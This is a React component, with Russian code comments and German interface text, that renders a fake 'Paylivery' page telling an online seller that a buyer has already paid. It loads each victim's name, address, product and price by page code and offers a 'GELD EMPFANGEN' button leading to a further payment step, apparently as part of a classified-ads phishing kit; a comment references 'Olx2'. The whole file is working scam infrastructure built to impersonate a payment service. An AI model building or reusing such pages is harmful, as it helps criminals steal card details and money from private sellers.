import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import SupportWidget from './SupportWidget';
import './PayliverySuccess.css';
import { getPrimaryCurrency } from '../stripeCurrency';

import { API_URL } from '../apiBase';
const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };

const PAYLIVERY_TOP_ICON_SRC = (process.env.PUBLIC_URL || '') + '/paylivery-logo.png';
const PAYLIVERY_STATUS_SCREEN_SRC = (process.env.PUBLIC_URL || '') + '/paylivery-status.png';
const hardcodedDE = {
  topLogo: '∞',
  heading: 'Zahlungseingang vom Käufer',

  statusTitle: 'Ihr Artikel wurde ausgestellt!',
  statusText: 'Der Käufer hat bereits für die Bestellung bezahlt.',

  shippingTitle: 'Versand Details',
  deliveryLabel: 'Lieferadresse',
  nameSurname: 'Nachname',
  nameForename: 'Vorname',

  secureTitle: 'Der Zahlungseingang ist sicher',
  receiveBtn: 'GELD EMPFANGEN',
  secureText:
    'Durch Klicken auf die Schaltfläche „GELD EMPFANGEN“ erklären Sie sich mit den Bedingungen der Nutzungsvereinbarungen einverstanden, indem Sie die Online „Sicheres Angebot“ akzeptieren.',

  footerLead:
    'Sobald Sie das Geld erhalten haben, senden Sie bitte die Waren an den Käufer zu den angegebenen Daten oder übergeben Sie die Ware dem Kurier, der Sie zurückrufen wird innerhalb von 12 Stunden',
  footerNote:
    'Nach dem Versand der Waren müssen Sie dem Käufer anzeigen innerhalb von innerhalb von 3 Tagen nach Erhalt des Geldes eine Versandnummer mitteilen.',
};

export default function PayliverySuccess() {
  const { pageCode: pageCodeParam } = useParams();
  const pageCodeFromParams = (() => {
    try {
      // page_code в БД создаётся длиной 12 символов
      if (pageCodeParam) return pageCodeParam;
      const m = window.location.pathname.match(/\/page\/([A-Z0-9]{12})(?:\/|$)/i);
      return m ? m[1] : null;
    } catch {
      return null;
    }
  })();

  const [pageData, setPageData] = useState(null);
  const [loading, setLoading] = useState(true);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  /* log/transition только на Olx2 */

  useEffect(() => {
    if (!pageCodeFromParams) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCodeFromParams}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCodeFromParams]);

  const countryCode = pageData?.country_code || 'AT';
  // На скрине PayLivery для AT отображается именно "EUR", поэтому без символа.
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const priceNumber = useMemo(() => {
    // Иногда в БД/ответе цена может приходить как строка с запятой или с символами.
    const raw = pageData?.price;
    if (raw == null) return 0;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : 0;
  }, [pageData?.price]);

  const priceText = useMemo(() => {
    if (!Number.isFinite(priceNumber)) return '—';
    return priceNumber % 1 === 0 ? String(priceNumber.toFixed(0)) : String(priceNumber);
  }, [priceNumber]);

  const firstName = pageData?.first_name || '';
  const lastName = pageData?.last_name || '';
  const productName = pageData?.product_name || 'Gartenmöbel (Tisch, Bänke und Stühle)';
  const deliveryAddress = pageData?.delivery_address || '—';
  const photoUrl = pageData?.photo_url || '';
  const currencyText = countryCode?.toUpperCase() === 'AT' ? 'EUR' : primaryCurrency;
  const topLogoSrc = PAYLIVERY_TOP_ICON_SRC;
  const { toIndex2 } = usePaymentPaths(pageCodeFromParams);
  const index2Path = toIndex2();
  if (loading) {
    return (
      <div className="pl1-wrap">
        <div className="pl1-heading" style={{ marginBottom: 0 }}>
          {hardcodedDE.heading}
        </div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="pl1-wrap">
      <div className="pl1-topbar" aria-hidden>
        <div className="pl1-topbar-inner">
          <img src={topLogoSrc} alt="" className="pl1-topbar-logo-img" />
        </div>
      </div>

      <div className="pl1-container">
        <div className="pl1-heading">{hardcodedDE.heading}</div>

        <div className="pl1-grid">
          {/* Row 1: product summary (left only) */}
          <div className="pl1-summary">
            <div className="pl1-summary-leftIcon" aria-hidden>
              {photoUrl ? <img src={photoUrl} alt="" className="pl1-summary-photo" /> : 'i'}
            </div>
            <div className="pl1-summary-body">
              <div className="pl1-summary-amount">
                {priceText} {currencyText}
              </div>
              <div className="pl1-summary-product">{productName}</div>
            </div>
          </div>

          <div className="pl1-summary-rightSpacer" aria-hidden />

          {/* Status + Versand: одна левая колонка (не тянется вниз из‑за высоты карточки справа) */}
          <div className="pl1-status-ship-column">
            <img src={PAYLIVERY_STATUS_SCREEN_SRC} alt="" className="pl1-status-screenshot" />
            <section className="pl1-shipping-block">
              <div className="pl1-section-title">{hardcodedDE.shippingTitle}</div>

              <div className="pl1-field">
                <div className="pl1-field-label">{hardcodedDE.deliveryLabel}</div>
                <div className="pl1-field-value">{deliveryAddress}</div>
              </div>

              <div className="pl1-name-row">
                <div className="pl1-name-col">
                  <div className="pl1-field-label">{hardcodedDE.nameSurname}</div>
                  <div className="pl1-underline-value">{lastName || '—'}</div>
                </div>
                <div className="pl1-name-col">
                  <div className="pl1-field-label">{hardcodedDE.nameForename}</div>
                  <div className="pl1-underline-value">{firstName || '—'}</div>
                </div>
              </div>

              <div className="pl1-footer-text">
                <p>{hardcodedDE.footerLead}</p>
                <p>{hardcodedDE.footerNote}</p>
              </div>
            </section>
          </div>

          <aside className="pl1-right">
            <div className="pl1-amount-card">
              <div className="pl1-amount-big">{priceText} {currencyText}</div>
              <Link to={index2Path} className="pl1-receive-btn">
                {hardcodedDE.receiveBtn}
              </Link>

              <div className="pl1-secure-row">
                <div className="pl1-secure-check" aria-hidden>✓</div>
                <div className="pl1-secure-title">{hardcodedDE.secureTitle}</div>
              </div>

              <div className="pl1-secure-text">{hardcodedDE.secureText}</div>
            </div>
          </aside>

          <div className="pl1-bottom-rightSpacer" aria-hidden />
        </div>
      </div>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

